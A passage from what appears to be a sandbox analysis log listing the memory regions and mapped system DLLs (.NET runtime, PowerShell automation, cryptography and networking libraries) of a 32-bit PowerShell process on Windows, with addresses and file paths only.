"pagefile_0x0000000000860000" filename = "" Region: id = 932 start_va = 0x9f0000 end_va = 0x1deffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009f0000" filename = "" Region: id = 933 start_va = 0x30000 end_va = 0x32fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "powershell.exe.mui" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\en-US\\powershell.exe.mui" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\en-us\\powershell.exe.mui") Region: id = 934 start_va = 0x70000 end_va = 0x70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 935 start_va = 0x80000 end_va = 0x80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 936 start_va = 0x1d0000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 937 start_va = 0x280000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 938 start_va = 0x390000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 939 start_va = 0x470000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 940 start_va = 0x1df0000 end_va = 0x20befff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 941 start_va = 0x73910000 end_va = 0x7399cfff monitored = 1 entry_point = 0x73922860 region_type = mapped_file name = "mscoreei.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscoreei.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscoreei.dll") Region: id = 942 start_va = 0x73a50000 end_va = 0x73a52fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\SysWOW64\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 943 start_va = 0x753a0000 end_va = 0x753f6fff monitored = 0 entry_point = 0x753b9ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 944 start_va = 0x73900000 end_va = 0x73908fff monitored = 0 entry_point = 0x73901220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 945 start_va = 0x71c90000 end_va = 0x7243efff monitored = 1 entry_point = 0x71cad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 946 start_va = 0x714e0000 end_va = 0x71c8efff monitored = 1 entry_point = 0x714fd0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 947 start_va = 0x71c90000 end_va = 0x7243efff monitored = 1 entry_point = 0x71cad0d0 region_type = mapped_file name = "clr.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll") Region: id = 948 start_va = 0x73b60000 end_va = 0x73b73fff monitored = 0 entry_point = 0x73b6ac00 region_type = mapped_file name = "vcruntime140_clr0400.dll" filename = "\\Windows\\SysWOW64\\vcruntime140_clr0400.dll" (normalized: "c:\\windows\\syswow64\\vcruntime140_clr0400.dll") Region: id = 949 start_va = 0x73ab0000 end_va = 0x73b5afff monitored = 0 entry_point = 0x73b45f20 region_type = mapped_file name = "ucrtbase_clr0400.dll" filename = "\\Windows\\SysWOW64\\ucrtbase_clr0400.dll" (normalized: "c:\\windows\\syswow64\\ucrtbase_clr0400.dll") Region: id = 950 start_va = 0x90000 end_va = 0x90fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 951 start_va = 0xa0000 end_va = 0xaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000a0000" filename = "" Region: id = 952 start_va = 0x160000 end_va = 0x16ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 953 start_va = 0x170000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 954 start_va = 0x180000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 955 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 956 start_va = 0x260000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 957 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 958 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 959 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 960 start_va = 0x20c0000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020c0000" filename = "" Region: id = 961 start_va = 0x4f0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 962 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 963 start_va = 0x2b0000 end_va = 0x2effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 964 start_va = 0x2110000 end_va = 0x214ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002110000" filename = "" Region: id = 965 start_va = 0x2240000 end_va = 0x227ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002240000" filename = "" Region: id = 966 start_va = 0x7efd8000 end_va = 0x7efdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 967 start_va = 0x210000 end_va = 0x21ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 968 start_va = 0x2280000 end_va = 0x427ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002280000" filename = "" Region: id = 969 start_va = 0x210000 end_va = 0x22ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 970 start_va = 0x21c0000 end_va = 0x21fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021c0000" filename = "" Region: id = 971 start_va = 0x2200000 end_va = 0x223ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002200000" filename = "" Region: id = 972 start_va = 0x7efd5000 end_va = 0x7efd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efd5000" filename = "" Region: id = 973 start_va = 0x530000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 974 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 975 start_va = 0x42d0000 end_va = 0x430ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 976 start_va = 0x7efad000 end_va = 0x7efaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efad000" filename = "" Region: id = 977 start_va = 0x70880000 end_va = 0x71c8afff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorlib.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\36eaccfde177c2e7b93b8dbdde4e012a\\mscorlib.ni.dll") Region: id = 978 start_va = 0x230000 end_va = 0x23ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 979 start_va = 0x4310000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004310000" filename = "" Region: id = 980 start_va = 0x240000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 981 start_va = 0x6fe20000 end_va = 0x70874fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\2c3c912ea8f058f9d04c4650128feb3f\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\2c3c912ea8f058f9d04c4650128feb3f\\system.ni.dll") Region: id = 982 start_va = 0x6f600000 end_va = 0x6fe17fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.core.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\31fae3290fad30c31c98651462d22724\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\31fae3290fad30c31c98651462d22724\\system.core.ni.dll") Region: id = 983 start_va = 0x74df0000 end_va = 0x74e7efff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.consolehost.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\Microsoft.Pb378ec07#\\731848746c032af3ce33577b793c9b9c\\Microsoft.PowerShell.ConsoleHost.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\microsoft.pb378ec07#\\731848746c032af3ce33577b793c9b9c\\microsoft.powershell.consolehost.ni.dll") Region: id = 984 start_va = 0x73e00000 end_va = 0x73e16fff monitored = 0 entry_point = 0x73e03573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 985 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 986 start_va = 0x420000 end_va = 0x45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 987 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 988 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 989 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 990 start_va = 0x390000 end_va = 0x3cbfff monitored = 0 entry_point = 0x39128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 991 start_va = 0x73dc0000 end_va = 0x73dfafff monitored = 0 entry_point = 0x73dc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 992 start_va = 0x6db10000 end_va = 0x6f5f2fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.automation.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\System.Management.Automation.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.manaa57fc8cc#\\a68aa6199c81feadf8c95a4ea0254b2c\\system.management.automation.ni.dll") Region: id = 993 start_va = 0x390000 end_va = 0x3f1fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "mscorrc.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\mscorrc.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\mscorrc.dll") Region: id = 994 start_va = 0x4f0000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 995 start_va = 0x4320000 end_va = 0x435ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004320000" filename = "" Region: id = 996 start_va = 0x4360000 end_va = 0x439ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004360000" filename = "" Region: id = 997 start_va = 0x4480000 end_va = 0x44bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 998 start_va = 0x4540000 end_va = 0x457ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004540000" filename = "" Region: id = 999 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1000 start_va = 0x7efaa000 end_va = 0x7efacfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efaa000" filename = "" Region: id = 1001 start_va = 0x74dd0000 end_va = 0x74de2fff monitored = 1 entry_point = 0x74ddd900 region_type = mapped_file name = "nlssorting.dll" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\nlssorting.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\nlssorting.dll") Region: id = 1002 start_va = 0x4580000 end_va = 0x4851fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nlp" filename = "\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\sortdefault.nlp" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\sortdefault.nlp") Region: id = 1003 start_va = 0x6d400000 end_va = 0x6db0bfff monitored = 1 entry_point = 0x6da1f392 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1004 start_va = 0x43a0000 end_va = 0x445ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 1005 start_va = 0x75010000 end_va = 0x75014fff monitored = 0 entry_point = 0x75011438 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 1006 start_va = 0x6ccf0000 end_va = 0x6d3fbfff monitored = 1 entry_point = 0x6d30f392 region_type = mapped_file name = "system.management.automation.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_msil\\system.management.automation\\v4.0_3.0.0.0__31bf3856ad364e35\\system.management.automation.dll") Region: id = 1007 start_va = 0x761c0000 end_va = 0x76e09fff monitored = 0 entry_point = 0x76241601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1008 start_va = 0x250000 end_va = 0x250fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1009 start_va = 0x75100000 end_va = 0x7512efff monitored = 0 entry_point = 0x75102a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\SysWOW64\\wintrust.dll" (normalized: "c:\\windows\\syswow64\\wintrust.dll") Region: id = 1010 start_va = 0x75f00000 end_va = 0x76020fff monitored = 0 entry_point = 0x75f0158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\SysWOW64\\crypt32.dll" (normalized: "c:\\windows\\syswow64\\crypt32.dll") Region: id = 1011 start_va = 0x75ef0000 end_va = 0x75efbfff monitored = 0 entry_point = 0x75ef238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\SysWOW64\\msasn1.dll" (normalized: "c:\\windows\\syswow64\\msasn1.dll") Region: id = 1012 start_va = 0x270000 end_va = 0x277fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1013 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 1014 start_va = 0x4870000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004870000" filename = "" Region: id = 1015 start_va = 0x7efa4000 end_va = 0x7efa6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa4000" filename = "" Region: id = 1016 start_va = 0x74dc0000 end_va = 0x74dc7fff monitored = 0 entry_point = 0x74dc3bf5 region_type = mapped_file name = "msisip.dll" filename = "\\Windows\\SysWOW64\\msisip.dll" (normalized: "c:\\windows\\syswow64\\msisip.dll") Region: id = 1017 start_va = 0x48b0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 1018 start_va = 0x290000 end_va = 0x297fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "microsoft.powershell.utility.psm1" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psm1" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psm1") Region: id = 1019 start_va = 0x48b0000 end_va = 0x4caffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000048b0000" filename = "" Region: id = 1020 start_va = 0x49b0000 end_va = 0x49effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000049b0000" filename = "" Region: id = 1021 start_va = 0x4a40000 end_va = 0x4a7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a40000" filename = "" Region: id = 1022 start_va = 0x74da0000 end_va = 0x74db5fff monitored = 0 entry_point = 0x74da13df region_type = mapped_file name = "wshext.dll" filename = "\\Windows\\SysWOW64\\wshext.dll" (normalized: "c:\\windows\\syswow64\\wshext.dll") Region: id = 1023 start_va = 0x7efa1000 end_va = 0x7efa3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Region: id = 1024 start_va = 0x6da80000 end_va = 0x6db03fff monitored = 0 entry_point = 0x6da819a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1025 start_va = 0x48b0000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 1026 start_va = 0x74d90000 end_va = 0x74d99fff monitored = 0 entry_point = 0x74d94ab0 region_type = mapped_file name = "pwrshsip.dll" filename = "\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\pwrshsip.dll" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\pwrshsip.dll") Region: id = 1027 start_va = 0x4a80000 end_va = 0x4b7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004a80000" filename = "" Region: id = 1028 start_va = 0x4b90000 end_va = 0x4bcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004b90000" filename = "" Region: id = 1029 start_va = 0x4bd0000 end_va = 0x4c0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004bd0000" filename = "" Region: id = 1030 start_va = 0x7ef9e000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9e000" filename = "" Region: id = 1031 start_va = 0x270000 end_va = 0x27ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 1032 start_va = 0x6d950000 end_va = 0x6da7ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.management.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Management\\e114780fd3ea5727401c06ea4f22ef35\\System.Management.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.management\\e114780fd3ea5727401c06ea4f22ef35\\system.management.ni.dll") Region: id = 1033 start_va = 0x6d820000 end_va = 0x6d94bfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.directoryservices.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\System.DirectoryServices.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.dired13b18a9#\\2e76676fbd265f70be92c82bbf76b8e5\\system.directoryservices.ni.dll") Region: id = 1034 start_va = 0x6d0a0000 end_va = 0x6d813fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.xml.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\15af16d373cf0528cb74fc73d365fdbf\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\15af16d373cf0528cb74fc73d365fdbf\\system.xml.ni.dll") Region: id = 1035 start_va = 0x6cf90000 end_va = 0x6d094fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.configuration.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\96f7edb07b12303f0ec2595c7f3778c7\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\96f7edb07b12303f0ec2595c7f3778c7\\system.configuration.ni.dll") Region: id = 1036 start_va = 0x290000 end_va = 0x290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1037 start_va = 0x2a0000 end_va = 0x2a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1038 start_va = 0x290000 end_va = 0x290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1039 start_va = 0x2a0000 end_va = 0x2a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1040 start_va = 0x290000 end_va = 0x290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1041 start_va = 0x290000 end_va = 0x296fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1042 start_va = 0x290000 end_va = 0x290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1043 start_va = 0x290000 end_va = 0x296fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1044 start_va = 0x290000 end_va = 0x290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1045 start_va = 0x290000 end_va = 0x296fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\tzres.dll.mui") Region: id = 1046 start_va = 0x20d0000 end_va = 0x210ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1047 start_va = 0x4c80000 end_va = 0x4cbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004c80000" filename = "" Region: id = 1048 start_va = 0x7efa7000 end_va = 0x7efa9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efa7000" filename = "" Region: id = 1049 start_va = 0x48b0000 end_va = 0x48effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048b0000" filename = "" Region: id = 1050 start_va = 0x48f0000 end_va = 0x492ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048f0000" filename = "" Region: id = 1051 start_va = 0x4960000 end_va = 0x496ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004960000" filename = "" Region: id = 1052 start_va = 0x7ef9b000 end_va = 0x7ef9dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 1053 start_va = 0x6c770000 end_va = 0x6cf89fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "system.data.ni.dll" filename = "\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Data\\df2dd09ed7c341842a104e1e668f184e\\System.Data.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.data\\df2dd09ed7c341842a104e1e668f184e\\system.data.ni.dll") Region: id = 1054 start_va = 0x6c410000 end_va = 0x6c763fff monitored = 1 entry_point = 0x6c747a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1055 start_va = 0x75090000 end_va = 0x750c4fff monitored = 0 entry_point = 0x7509145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 1056 start_va = 0x77430000 end_va = 0x77435fff monitored = 0 entry_point = 0x77431782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\SysWOW64\\nsi.dll" (normalized: "c:\\windows\\syswow64\\nsi.dll") Region: id = 1057 start_va = 0x4cc0000 end_va = 0x5010fff monitored = 1 entry_point = 0x4ff7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1058 start_va = 0x4cc0000 end_va = 0x5010fff monitored = 1 entry_point = 0x4ff7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1059 start_va = 0x4cc0000 end_va = 0x5010fff monitored = 1 entry_point = 0x4ff7a72 region_type = mapped_file name = "system.data.dll" filename = "\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll" (normalized: "c:\\windows\\microsoft.net\\assembly\\gac_32\\system.data\\v4.0_4.0.0.0__b77a5c561934e089\\system.data.dll") Region: id = 1060 start_va = 0x4cc0000 end_va = 